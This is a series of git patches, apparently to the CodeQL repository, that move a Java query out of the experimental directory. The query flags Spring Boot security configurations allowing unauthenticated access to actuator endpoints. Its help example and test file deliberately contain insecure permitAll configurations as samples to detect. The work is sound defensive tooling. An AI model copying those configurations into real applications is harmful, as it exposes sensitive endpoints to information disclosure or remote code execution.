.../CWE/CWE-016/SpringBootActuators.qhelp | 39 +++++ .../CWE/CWE-016/SpringBootActuators.ql | 20 +++ .../CWE/CWE-016/SpringBootActuators.qll | 157 ++++++++++++++++++ .../CWE-016/SpringBootActuators.expected | 7 + .../security/CWE-016/SpringBootActuators.java | 104 ++++++++++++ .../CWE-016/SpringBootActuators.qlref | 1 + .../test/query-tests/security/CWE-016/options | 1 + 8 files changed, 351 insertions(+) create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql create mode 100644 java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref create mode 100644 java/ql/test/query-tests/security/CWE-016/options diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java new file mode 100644 index 000000000000..5aec49837cac --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java @@ -0,0 +1,22 @@ +@Configuration(proxyBeanMethods = false) +public class SpringBootActuators extends WebSecurityConfigurerAdapter { + + @Override + protected void configure(HttpSecurity http) throws Exception { + // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> + requests.anyRequest().permitAll()); + } +} + +@Configuration(proxyBeanMethods = false) +public class ActuatorSecurity extends WebSecurityConfigurerAdapter { + + @Override + protected void configure(HttpSecurity http) throws Exception { + // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> + requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + http.httpBasic(); + } +} diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp new file mode 100644 index 000000000000..53ee653aaff3 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp @@ -0,0 +1,39 @@ + + + +

Spring Boot includes a number of additional features called actuators that let you monitor +and interact with your web application. Exposing unprotected actuator endpoints via JXM or HTTP +can, however, lead to information disclosure or even to remote code execution vulnerability.

+ + + +

Since actuator endpoints may contain sensitive information, careful consideration should be +given about when to expose them. You should take care to secure exposed HTTP endpoints in the same +way that you would any other sensitive URL. If Spring Security is present, endpoints are secured by +default using Spring Security’s content-negotiation strategy. If you wish to configure custom +security for HTTP endpoints, for example, only allow users with a certain role to access them, +Spring Boot provides some convenient RequestMatcher objects that can be used in +combination with Spring Security.

+ + + +

In the first example, the custom security configuration allows unauthenticated access to all +actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

+

In the second example, only users with ENDPOINT_ADMIN role are allowed to access +the actuator endpoints.

+ + + + + +
  • +Spring Boot documentation: +Actuators. +
    • +
  • +Exploiting Spring Boot Actuators +
    • +     +     diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql new file mode 100644 index 000000000000..574336074254 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql @@ -0,0 +1,20 @@ +/** + * @name Exposed Spring Boot actuators + * @description Exposing Spring Boot actuators may lead to internal application's information leak + * or even to remote code execution. + * @kind problem + * @problem.severity error + * @precision high + * @id java/spring-boot-exposed-actuators + * @tags security + * experimental + * external/cwe/cwe-16 + */ + +import java +deprecated import SpringBootActuators + +deprecated query predicate problems(PermitAllCall permitAllCall, string message) { + permitAllCall.permitsSpringBootActuators() and + message = "Unauthenticated access to Spring Boot actuator is allowed." +} diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll new file mode 100644 index 000000000000..881f2a131720 --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll @@ -0,0 +1,157 @@ +deprecated module; + +import java + +/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ +class TypeHttpSecurity extends Class { + TypeHttpSecurity() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", + "HttpSecurity") + } +} + +/** + * The class + * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. + */ +class TypeAuthorizedUrl extends Class { + TypeAuthorizedUrl() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", + "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") + } +} + +/** + * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. + */ +class TypeAbstractRequestMatcherRegistry extends Class { + TypeAbstractRequestMatcherRegistry() { + this.hasQualifiedName("org.springframework.security.config.annotation.web", + "AbstractRequestMatcherRegistry>") + } +} + +/** + * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. + */ +class TypeEndpointRequest extends Class { + TypeEndpointRequest() { + this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", + "EndpointRequest") + } +} + +/** A call to `EndpointRequest.toAnyEndpoint` method. */ +class ToAnyEndpointCall extends MethodCall { + ToAnyEndpointCall() { + this.getMethod().hasName("toAnyEndpoint") and + this.getMethod().getDeclaringType() instanceof TypeEndpointRequest + } +} + +/** + * A call to `HttpSecurity.requestMatcher` method with argument `RequestMatcher.toAnyEndpoint()`. + */ +class RequestMatcherCall extends MethodCall { + RequestMatcherCall() { + this.getMethod().hasName("requestMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0) instanceof ToAnyEndpointCall + } +} + +/** + * A call to `HttpSecurity.requestMatchers` method with lambda argument + * `RequestMatcher.toAnyEndpoint()`. + */ +class RequestMatchersCall extends MethodCall { + RequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall + } +} + +/** A call to `HttpSecurity.authorizeRequests` method. */ +class AuthorizeRequestsCall extends MethodCall { + AuthorizeRequestsCall() { + this.getMethod().hasName("authorizeRequests") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to `AuthorizedUrl.permitAll` method. */ +class PermitAllCall extends MethodCall { + PermitAllCall() { + this.getMethod().hasName("permitAll") and + this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl + } + + /** Holds if `permitAll` is called on request(s) mapped to actuator endpoint(s). */ + predicate permitsSpringBootActuators() { + exists(AuthorizeRequestsCall authorizeRequestsCall | + // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall + or + // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall + | + // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and + ( + this.getQualifier() instanceof AnyRequestCall or + this.getQualifier() instanceof RegistryRequestMatchersCall + ) + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + // [...].authorizeRequests().anyRequest().permitAll() + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + this.getQualifier() = registryRequestMatchersCall + ) + or + exists(AnyRequestCall anyRequestCall | + anyRequestCall.getQualifier() = authorizeRequestsCall and + this.getQualifier() = anyRequestCall + ) + ) + or + exists(AuthorizeRequestsCall authorizeRequestsCall | + // http.authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof VarAccess + | + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and + this.getQualifier() instanceof RegistryRequestMatchersCall + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + this.getQualifier() = registryRequestMatchersCall + ) + ) + } +} + +/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ +class AnyRequestCall extends MethodCall { + AnyRequestCall() { + this.getMethod().hasName("anyRequest") and + this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry + } +} + +/** + * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument + * `RequestMatcher.toAnyEndpoint()`. + */ +class RegistryRequestMatchersCall extends MethodCall { + RegistryRequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry and + this.getAnArgument() instanceof ToAnyEndpointCall + } +} diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected new file mode 100644 index 000000000000..f2874e3694d1 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected @@ -0,0 +1,7 @@ +| SpringBootActuators.java:6:88:6:120 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:10:5:10:137 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:14:5:14:149 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:18:5:18:101 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:22:5:22:89 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:26:40:26:108 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | +| SpringBootActuators.java:30:5:30:113 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java new file mode 100644 index 000000000000..da59919fbe6c --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java @@ -0,0 +1,104 @@ +import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; +import org.springframework.security.config.annotation.web.builders.HttpSecurity; + +public class SpringBootActuators { + protected void configure(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configure2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + } + + protected void configure3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + } + + protected void configure4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + } + + protected void configure5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + } + + protected void configure6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); + } + + protected void configure7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOk1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk2(HttpSecurity http) throws Exception { + http.requestMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk3(HttpSecurity http) throws Exception { + http.authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOk4(HttpSecurity http) throws Exception { + http.authorizeRequests(authz -> authz.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health")).authorizeRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); + } + + protected void configureOkSafeEndpoints7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); + } + + protected void configureOkNoPermitAll5(HttpSecurity http) throws Exception { + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); + } + + protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); + } +} diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref new file mode 100644 index 000000000000..ec49ecd718c2 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref @@ -0,0 +1 @@ +experimental/Security/CWE/CWE-016/SpringBootActuators.ql diff --git a/java/ql/test/query-tests/security/CWE-016/options b/java/ql/test/query-tests/security/CWE-016/options new file mode 100644 index 000000000000..06ec85dc706c --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/options @@ -0,0 +1 @@ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 From 978834bd9cc0ec542e45988a82613a0c7a14e40e Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 16 Feb 2025 12:16:14 -0500 Subject: [PATCH 012/892] Java: remove deprecations --- java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql | 9 ++++----- java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll | 2 -- 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql index 574336074254..b700e691550f 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql @@ -12,9 +12,8 @@ */ import java -deprecated import SpringBootActuators +import SpringBootActuators -deprecated query predicate problems(PermitAllCall permitAllCall, string message) { - permitAllCall.permitsSpringBootActuators() and - message = "Unauthenticated access to Spring Boot actuator is allowed." -} +from PermitAllCall permitAllCall +where permitAllCall.permitsSpringBootActuators() +select permitAllCall, "Unauthenticated access to Spring Boot actuator is allowed." diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll index 881f2a131720..195de7a1b8be 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll @@ -1,5 +1,3 @@ -deprecated module; - import java /** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ From 089a491d5a332f4aa43e53e518b79088673f38af Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 16 Feb 2025 12:20:23 -0500 Subject: [PATCH 013/892] Java: fix tests; update for non-experimental directory --- .../test/query-tests/security/CWE-016/SpringBootActuators.qlref | 2 +- java/ql/test/query-tests/security/CWE-016/options | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref index ec49ecd718c2..abd5f2a75991 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref @@ -1 +1 @@ -experimental/Security/CWE/CWE-016/SpringBootActuators.ql +Security/CWE/CWE-016/SpringBootActuators.ql diff --git a/java/ql/test/query-tests/security/CWE-016/options b/java/ql/test/query-tests/security/CWE-016/options index 06ec85dc706c..38d1d754b69c 100644 --- a/java/ql/test/query-tests/security/CWE-016/options +++ b/java/ql/test/query-tests/security/CWE-016/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8 From 5e5bc2afe9d4264a226897b49a8903b37bfebaa1 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 16 Feb 2025 12:30:42 -0500 Subject: [PATCH 014/892] Java: remove experimental files --- .../CWE/CWE-016/SpringBootActuators.java | 22 --- .../CWE/CWE-016/SpringBootActuators.qhelp | 39 ----- .../CWE/CWE-016/SpringBootActuators.ql | 20 --- .../CWE/CWE-016/SpringBootActuators.qll | 157 ------------------ .../CWE-016/SpringBootActuators.expected | 7 - .../security/CWE-016/SpringBootActuators.java | 104 ------------ .../CWE-016/SpringBootActuators.qlref | 1 - 7 files changed, 350 deletions(-) delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql delete mode 100644 java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll delete mode 100644 java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected delete mode 100644 java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java delete mode 100644 java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java deleted file mode 100644 index 538620550efc..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java +++ /dev/null @@ -1,22 +0,0 @@ -@Configuration(proxyBeanMethods = false) -public class SpringBootActuators extends WebSecurityConfigurerAdapter { - - @Override - protected void configure(HttpSecurity http) throws Exception { - // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().permitAll()); - } -} - -@Configuration(proxyBeanMethods = false) -public class ActuatorSecurity extends WebSecurityConfigurerAdapter { - - @Override - protected void configure(HttpSecurity http) throws Exception { - // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().hasRole("ENDPOINT_ADMIN")); - http.httpBasic(); - } -} \ No newline at end of file diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp deleted file mode 100644 index 53ee653aaff3..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp +++ /dev/null @@ -1,39 +0,0 @@ - - - -

    Spring Boot includes a number of additional features called actuators that let you monitor -and interact with your web application. Exposing unprotected actuator endpoints via JXM or HTTP -can, however, lead to information disclosure or even to remote code execution vulnerability.

    -     - - -

    Since actuator endpoints may contain sensitive information, careful consideration should be -given about when to expose them. You should take care to secure exposed HTTP endpoints in the same -way that you would any other sensitive URL. If Spring Security is present, endpoints are secured by -default using Spring Security’s content-negotiation strategy. If you wish to configure custom -security for HTTP endpoints, for example, only allow users with a certain role to access them, -Spring Boot provides some convenient RequestMatcher objects that can be used in -combination with Spring Security.

    -     - - -

    In the first example, the custom security configuration allows unauthenticated access to all -actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

    -

    In the second example, only users with ENDPOINT_ADMIN role are allowed to access -the actuator endpoints.

    - - -     - - -
  • -Spring Boot documentation: -Actuators. -
    • -
  • -Exploiting Spring Boot Actuators -
    • -     -     diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql deleted file mode 100644 index 574336074254..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql +++ /dev/null @@ -1,20 +0,0 @@ -/** - * @name Exposed Spring Boot actuators - * @description Exposing Spring Boot actuators may lead to internal application's information leak - * or even to remote code execution. - * @kind problem - * @problem.severity error - * @precision high - * @id java/spring-boot-exposed-actuators - * @tags security - * experimental - * external/cwe/cwe-16 - */ - -import java -deprecated import SpringBootActuators - -deprecated query predicate problems(PermitAllCall permitAllCall, string message) { - permitAllCall.permitsSpringBootActuators() and - message = "Unauthenticated access to Spring Boot actuator is allowed." -} diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll deleted file mode 100644 index 881f2a131720..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll +++ /dev/null @@ -1,157 +0,0 @@ -deprecated module; - -import java - -/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ -class TypeHttpSecurity extends Class { - TypeHttpSecurity() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", - "HttpSecurity") - } -} - -/** - * The class - * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. - */ -class TypeAuthorizedUrl extends Class { - TypeAuthorizedUrl() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", - "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") - } -} - -/** - * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. - */ -class TypeAbstractRequestMatcherRegistry extends Class { - TypeAbstractRequestMatcherRegistry() { - this.hasQualifiedName("org.springframework.security.config.annotation.web", - "AbstractRequestMatcherRegistry>") - } -} - -/** - * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. - */ -class TypeEndpointRequest extends Class { - TypeEndpointRequest() { - this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", - "EndpointRequest") - } -} - -/** A call to `EndpointRequest.toAnyEndpoint` method. */ -class ToAnyEndpointCall extends MethodCall { - ToAnyEndpointCall() { - this.getMethod().hasName("toAnyEndpoint") and - this.getMethod().getDeclaringType() instanceof TypeEndpointRequest - } -} - -/** - * A call to `HttpSecurity.requestMatcher` method with argument `RequestMatcher.toAnyEndpoint()`. - */ -class RequestMatcherCall extends MethodCall { - RequestMatcherCall() { - this.getMethod().hasName("requestMatcher") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0) instanceof ToAnyEndpointCall - } -} - -/** - * A call to `HttpSecurity.requestMatchers` method with lambda argument - * `RequestMatcher.toAnyEndpoint()`. - */ -class RequestMatchersCall extends MethodCall { - RequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall - } -} - -/** A call to `HttpSecurity.authorizeRequests` method. */ -class AuthorizeRequestsCall extends MethodCall { - AuthorizeRequestsCall() { - this.getMethod().hasName("authorizeRequests") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity - } -} - -/** A call to `AuthorizedUrl.permitAll` method. */ -class PermitAllCall extends MethodCall { - PermitAllCall() { - this.getMethod().hasName("permitAll") and - this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl - } - - /** Holds if `permitAll` is called on request(s) mapped to actuator endpoint(s). */ - predicate permitsSpringBootActuators() { - exists(AuthorizeRequestsCall authorizeRequestsCall | - // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall - or - // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall - | - // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - ( - this.getQualifier() instanceof AnyRequestCall or - this.getQualifier() instanceof RegistryRequestMatchersCall - ) - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - // [...].authorizeRequests().anyRequest().permitAll() - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - or - exists(AnyRequestCall anyRequestCall | - anyRequestCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = anyRequestCall - ) - ) - or - exists(AuthorizeRequestsCall authorizeRequestsCall | - // http.authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof VarAccess - | - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - this.getQualifier() instanceof RegistryRequestMatchersCall - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - ) - } -} - -/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ -class AnyRequestCall extends MethodCall { - AnyRequestCall() { - this.getMethod().hasName("anyRequest") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry - } -} - -/** - * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument - * `RequestMatcher.toAnyEndpoint()`. - */ -class RegistryRequestMatchersCall extends MethodCall { - RegistryRequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry and - this.getAnArgument() instanceof ToAnyEndpointCall - } -} diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected deleted file mode 100644 index f2874e3694d1..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected +++ /dev/null @@ -1,7 +0,0 @@ -| SpringBootActuators.java:6:88:6:120 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:10:5:10:137 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:14:5:14:149 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:18:5:18:101 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:22:5:22:89 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:26:40:26:108 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:30:5:30:113 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java deleted file mode 100644 index da59919fbe6c..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java +++ /dev/null @@ -1,104 +0,0 @@ -import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; -import org.springframework.security.config.annotation.web.builders.HttpSecurity; - -public class SpringBootActuators { - protected void configure(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); - } - - protected void configure2(HttpSecurity http) throws Exception { - 